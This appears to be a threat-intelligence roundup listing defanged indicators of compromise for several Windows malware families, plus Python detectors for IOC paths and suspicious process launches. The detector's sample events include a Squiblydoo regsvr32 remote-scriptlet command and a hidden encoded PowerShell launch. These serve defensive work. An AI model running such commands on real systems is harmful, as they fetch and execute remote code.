macgregor[.]co[.]kr 2
urayasu[.]net 2
ulcndsu[.]org 2
cath4choice[.]org 2
midwestga[.]com 2
hifuken[.]com 2
fleshercorp[.]com 2
norakuroya[.]com 2
csmbc[.]org 2
genmar[.]gen[.]tr 2
minatech[.]net 2
nori-k[.]com 2

*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 4
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 4
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 4
%HOMEPATH%\ruslobofludo.exe 2
%ProgramData%\Local Settings 1
%ProgramData%\Local Settings\Temp 1
%APPDATA%\tor\hidden_service 1
%APPDATA%\tor\hidden_service\hostname.tmp 1
%APPDATA%\tor\hidden_service\private_key.tmp 1
%APPDATA%\tor\lock 1
%APPDATA%\tor\state.tmp 1
%ProgramData%\Local Settings\Temp\mstaox.com 1
%APPDATA%\Boydax\reecu.yma 1
%APPDATA%\Etadig\axrir.onb 1
%APPDATA%\Henet\inaw.afd 1
%APPDATA%\Ylze\biuf.kam 1
%TEMP%\1249091494.bat 1
%APPDATA%\Rouq\keimm.ahq 1
%APPDATA%\Nyahgu\idyv.esl 1
%TEMP%\1249011699.bat 1
%TEMP%\191953.bat 1
%ProgramFiles(x86)%\Local Settings\Temp\msmfettg.scr 1
%TEMP%\109890.bat 1

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Downloader.Banload-9861199-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes | Occurrences
A7A5B4B2BE50 7
MichigamLM 4
D439348968346 4
DJ98988988 2
wwwwt 1
t0278tn29877102983 1
g3h4jhj3j 1
dssdndsdfjdfjfj 1
DJ9679676072 1
LM09298885 1
Qrweiorweiopi 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]64[.]101[.]30 4
172[.]64[.]100[.]30 2
172[.]217[.]197[.]138 1
172[.]217[.]197[.]113 1
173[.]194[.]175[.]94 1
173[.]194[.]207[.]94 1
172[.]217[.]197[.]132 1
209[.]85[.]201[.]94 1
209[.]85[.]201[.]138 1
173[.]194[.]207[.]138 1
172[.]217[.]222[.]100 1
209[.]85[.]144[.]99 1
173[.]194[.]207[.]84 1
52[.]95[.]165[.]35 1
52[.]217[.]33[.]190 1
185[.]181[.]11[.]159 1
52[.]216[.]84[.]109 1
52[.]216[.]76[.]254 1
52[.]217[.]79[.]142 1
52[.]216[.]245[.]54 1
52[.]217[.]48[.]70 1
52[.]217[.]85[.]222 1
192[.]95[.]42[.]24 1
52[.]216[.]129[.]45 1
52[.]217[.]45[.]150 1

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
s3[.]amazonaws[.]com 9
www[.]sendspace[.]com 6
www[.]masterpublicidade[.]com 3
sites[.]google[.]com 1
s3-sa-east-1[.]amazonaws[.]com 1
www[.]cabanadosol[.]net 1
brasilcargas[.]space 1
Files and/or directories created | Occurrences
\ID.Dat 11
%ProgramFiles%\XCV5NQ6T5\ZS3423.467 4
%ProgramFiles(x86)%\XCV5NQ6T5 4
%ProgramFiles(x86)%\XCV5NQ6T5\ZS3423.467 4
%ProgramFiles(x86)%\Cllbs 4
%ProgramFiles(x86)%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx 3
%ProgramFiles(x86)%\AlphabeticManager 2
%ProgramFiles%\NJNQ6T5\657w5.5474 1
\do 1
\zoomed 1
%ProgramFiles(x86)%\NJNQ6T5 1
%ProgramFiles(x86)%\NJNQ6T5\657w5.5474 1
\grinders 1
%ProgramFiles(x86)%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx\0439034906.467 1
\ld 1
\aldvids 1
%ProgramFiles(x86)%\ZIUjlcmbvbhxjuisvsheimgvhmdwhuzmx 1
\algelon 1
%ProgramFiles(x86)%\soapv2 1
\pnTemp 1
%ProgramFiles(x86)%\PITUjlcmbvbhxjuisvsheimgvhmdwhuzmx 1
%ProgramFiles%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx\0439034906.467 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Tofsee-9861724-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ohvbaiod
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jcqwvdjy
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
1
Mutexes | Occurrences
Global\<random guid> 7
YMyooCcSkKSRdwHNrGke 2
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
43[.]231[.]4[.]7 18
217[.]172[.]179[.]54 18
144[.]76[.]108[.]82 18
212[.]22[.]87[.]191 18
51[.]178[.]207[.]67 18
195[.]242[.]110[.]99 18
87[.]251[.]71[.]150 18
91[.]203[.]5[.]144 18
157[.]240[.]18[.]174 12
37[.]1[.]217[.]172 11
104[.]47[.]17[.]161 10
40[.]76[.]4[.]15 9
172[.]217[.]10[.]228 9
216[.]239[.]36[.]126 9
211[.]231[.]108[.]176 8
195[.]186[.]120[.]50 6
172[.]217[.]10[.]35 6
104[.]47[.]53[.]36 6
31[.]13[.]65[.]174 6
211[.]231[.]108[.]174/31 6
172[.]217[.]12[.]132 5
40[.]112[.]72[.]205 5
172[.]217[.]10[.]67 5
104[.]47[.]54[.]36 5
188[.]125[.]72[.]74 5

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 18
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 18
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 18
249[.]5[.]55[.]69[.]in-addr[.]arpa 18
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 18
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 18
microsoft-com[.]mail[.]protection[.]outlook[.]com 18
microsoft[.]com 18
www[.]google[.]com 18
www[.]instagram[.]com 18
178[.]79[.]134[.]18[.]in-addr[.]arpa 12
work[.]a-poster[.]info 11
234[.]172[.]168[.]18[.]in-addr[.]arpa 11
app[.]snapchat[.]com 9
i[.]instagram[.]com 6
smtp[.]gmail[.]com 6
ip[.]pr-cy[.]hacklix[.]com 5
www[.]google[.]co[.]uk 5
www[.]google[.]ru 5
www[.]bing[.]com 4
www[.]amazon[.]com 4
www[.]google[.]es 4
www[.]google[.]de 4
accounts[.]snapchat[.]com 4
yabs[.]yandex[.]ru 4

*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 20
%SystemRoot%\SysWOW64\config\systemprofile 18
%SystemRoot%\SysWOW64\config\systemprofile:.repos 18
\Device\ConDrv 18
%System32%\config\systemprofile:.repos 18
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 18
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 17
%TEMP%\CC4F.tmp 7
%APPDATA%\Microsoft\Network 2
%APPDATA%\Microsoft\Network\sqlcmd.exe 2
%System32%\Tasks\Azure-Update-Task 2
%APPDATA%\nailedp 2
%APPDATA%\nailedp\edspolishpp.exe 2
%TEMP%\ikflerb.exe 1
%TEMP%\egbhanx.exe 1
%TEMP%\tmpE816.tmp 1
%TEMP%\tmpE846.tmp 1
%TEMP%\tmp24F5.tmp 1
%TEMP%\tmp2534.tmp 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK
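
Several of the Tofsee rows above are templates rather than literal values: a service key named `<random, matching '[A-Z0-9]{8}'>`, a dropped `%TEMP%\<random, matching '[a-z]{8}'>.exe`, and a per-sample directory under SysWOW64, plus Windows Defender exclusion entries pointing at those SysWOW64 paths. The Python below is an added example of turning such rows into anchored regexes and scanning endpoint events with them; it is not Talos code. The templates are copied from the Tofsee tables, except that the Defender-exclusion template generalises the concrete values listed (C:\Windows\SysWOW64\zsgmltzo and similar) to an eight-letter name, which is an assumption of mine. The expansions of %TEMP%, %SystemRoot% and the other roots are assumed Windows defaults, registry events are modelled as key\value strings, and the sample events are constructed.

```python
"""Turn the roundup's templated file and registry IOCs into regexes and
scan endpoint events with them.

Added example, not Talos code.  Templates are taken from the Tofsee tables;
the Defender-exclusion template generalises the listed values
(C:\\Windows\\SysWOW64\\zsgmltzo and similar) to an eight-letter name, which
is an assumption.  Root expansions and the sample events are constructed."""
import re

PLACEHOLDER_RE = re.compile(r"<random, matching '([^']+)'>")

# Assumed default expansions of the roots the tables use; adjust per fleet.
ROOT_PATTERNS = {
    "%TEMP%": r"[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"[A-Za-z]:\\Users\\[^\\]+\\AppData\\Roaming",
    "%SystemRoot%": r"[A-Za-z]:\\Windows",
    "%System32%": r"[A-Za-z]:\\Windows\\System32",
    "<HKLM>": r"HKLM",
    "<HKU>": r"HKU",
}

# IOC rows from the Tofsee section; registry rows are written as key\value.
IOC_TEMPLATES = {
    "tofsee_dropper_in_temp": r"%TEMP%\<random, matching '[a-z]{8}'>.exe",
    "tofsee_syswow64_dir": r"%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>",
    "tofsee_service_imagepath":
        r"<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>\ImagePath",
    "defender_exclusion_syswow64":  # generalised from the listed values (assumption)
        r"<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS"
        r"\C:\Windows\SysWOW64\<random, matching '[a-z]{8}'>",
}

# Constructed events: (event type, observed path or key\value).
SAMPLE_EVENTS = [
    ("file_create", r"C:\Users\alice\AppData\Local\Temp\kqwzbfde.exe"),
    ("file_create", r"C:\Windows\SysWOW64\zsgmltzo"),
    ("file_create", r"C:\Users\alice\AppData\Local\Temp\setup.exe"),  # 5 letters: no match
    ("reg_set", r"HKLM\SYSTEM\ControlSet001\Services\A1B2C3D4\ImagePath"),
    ("reg_set", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
                r"\C:\Windows\SysWOW64\zsgmltzo"),
    ("reg_set", r"HKLM\SYSTEM\ControlSet001\Services\Spooler\ImagePath"),  # 7 chars: no match
]


def _literal(text: str) -> str:
    """Escape literal template text, then swap each root for its pattern."""
    out = re.escape(text)
    for root, pattern in ROOT_PATTERNS.items():
        out = out.replace(re.escape(root), pattern)
    return out


def ioc_template_to_regex(template: str):
    """Compile one templated IOC row into an anchored, case-insensitive regex.

    Literal text is escaped, each <random, matching '...'> placeholder is
    inlined as a capture group, and roots such as %TEMP% are expanded.
    """
    parts, pos = [], 0
    for m in PLACEHOLDER_RE.finditer(template):
        parts.append(_literal(template[pos:m.start()]))
        parts.append("(" + m.group(1) + ")")
        pos = m.end()
    parts.append(_literal(template[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def compile_templates(templates: dict) -> dict:
    """Compile every named template once so scanning is cheap."""
    return {name: ioc_template_to_regex(t) for name, t in templates.items()}


def scan_events(events, compiled: dict):
    """Return (event type, value, template name) for every matching event."""
    return [
        (etype, value, name)
        for etype, value in events
        for name, rx in compiled.items()
        if rx.match(value)
    ]


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS, compile_templates(IOC_TEMPLATES)):
        print(hit)
```

On the constructed events this yields four hits, one per template, while the five-letter setup.exe and the seven-character Spooler service fall outside the anchored length classes. Anchoring both ends and expanding roots to explicit directory patterns is what keeps a `[a-z]{8}` placeholder from matching arbitrary paths; if your telemetry normalises paths differently (for example with the drive letter stripped), change ROOT_PATTERNS rather than the templates.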


Win.Packed.Razy-9862528-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> 25
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
Domain Names contacted by malware (does not indicate maliciousness) / Occurrences

*See JSON for more IOCs

Files and/or directories created / Occurrences
%System32%\Tasks\Google_Trk_Updater 23
<malware cwd>\old_<malware exe name> (copy) 23
\old_runme.exe (copy) 2

File Hashes
*See JSON for more IOCs

Coverage

Product / Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zegost-9861320-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys / Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: Start) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: ErrorControl) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: DisplayName) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: WOW64) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: ObjectName) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: Description) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: Type) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: Type) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: Start) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: ErrorControl) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: ImagePath) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: DisplayName) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: WOW64) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: ObjectName) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: MarkTime) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY (Value Name: Description) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: ImagePath) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL (Value Name: MarkTime) 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEUMEB TLCTH (Value Name: MarkTime) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEUMEB TLCTH (Value Name: Description) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0 (Value Name: Type) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0 (Value Name: Start) 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0 (Value Name: ErrorControl) 1
Mutexes / Occurrences
Global\<random guid> 12
<original file dir>\<original file name>.exe 12
C:\Program Files \(x86\)\Google\<random, matching '[A-Z][a-z]{4}'>.exe 12
CdD3CQQF99D3DRCm 4
CtD3CQQF99D3DRCm 3
B/n+DQUP8wkQ0Aizs7S00BAJ+qY= 2
9/f30BED/g4LDND6D/am 1
EQO30P79/KY= 1
+PbztNARA/4OCwzQ+g/2pg== 1
IP Addresses contacted by malware (does not indicate maliciousness) / Occurrences
Domain Names contacted by malware (does not indicate maliciousness) / Occurrences
Files and/or directories created / Occurrences
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.exe 13
%ProgramFiles(x86)%\Google 12
%ProgramFiles\(x86\)%\Google\<random, matching '[A-Z][a-z]{4}'>.exe 12

File Hashes
Coverage

Product / Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (11610)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (6207)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Reverse TCP payload detected - (2703)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
Crystalbit-Apple DLL double hijack detected - (1176)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Squiblydoo application whitelist bypass attempt detected - (925)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
A Microsoft Office process has started a Windows utility - (632)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Kovter injection detected - (625)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Trickbot malware detected - (333)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (264)
DealPly is adware which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into webpages. Adware has also been known to download and install malware.
Cobalt Strike activity detected - (184)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.
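Three of the behaviours listed above (an Office process starting a Windows utility, an excessively long or encoded PowerShell command line, and a Squiblydoo-style regsvr32 launch) can be expressed as checks over process-creation telemetry. The following is an added example, not Talos or AMP code; the event fields, process lists, length threshold and sample events are assumptions constructed for illustration.

```python
import re
from typing import List, NamedTuple

# Process names and the length threshold are assumptions; tune per environment.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
UTILITIES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
             "mshta.exe", "regsvr32.exe", "rundll32.exe"}
LONG_CMDLINE = 1000
# Base64 blob after -enc/-encodedcommand: a script hidden from casual review
ENCODED_PS = re.compile(r"-(encodedcommand|enc|e)\s+[A-Za-z0-9+/=]{40,}", re.I)
# Squiblydoo: regsvr32 told to fetch a remote scriptlet through its /i: argument
REMOTE_SCT = re.compile(r"/i:\s*https?://", re.I)

class ProcEvent(NamedTuple):
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every behaviour the event matches (may be empty)."""
    hits, child = [], basename(ev.image)
    if basename(ev.parent) in OFFICE and child in UTILITIES:
        hits.append("office-spawned-utility")
    if child == "powershell.exe" and (len(ev.cmdline) > LONG_CMDLINE
                                      or ENCODED_PS.search(ev.cmdline)):
        hits.append("long-or-encoded-powershell")
    if (child == "regsvr32.exe" and "scrobj.dll" in ev.cmdline.lower()
            and REMOTE_SCT.search(ev.cmdline)):
        hits.append("squiblydoo-regsvr32")
    return hits

def scan(events: List[ProcEvent]) -> dict:
    """Map event index -> matched behaviours, for every event that fired."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}

# Constructed sample events, not real telemetry.
SAMPLE = [
    ProcEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc " + "QUFB" * 15),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32 /s /i:http://example.invalid/a.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe readme.txt"),
]
```

A single event can match more than one behaviour (an Office-spawned, encoded PowerShell command fires two), which is why `classify` returns a list rather than stopping at the first hit.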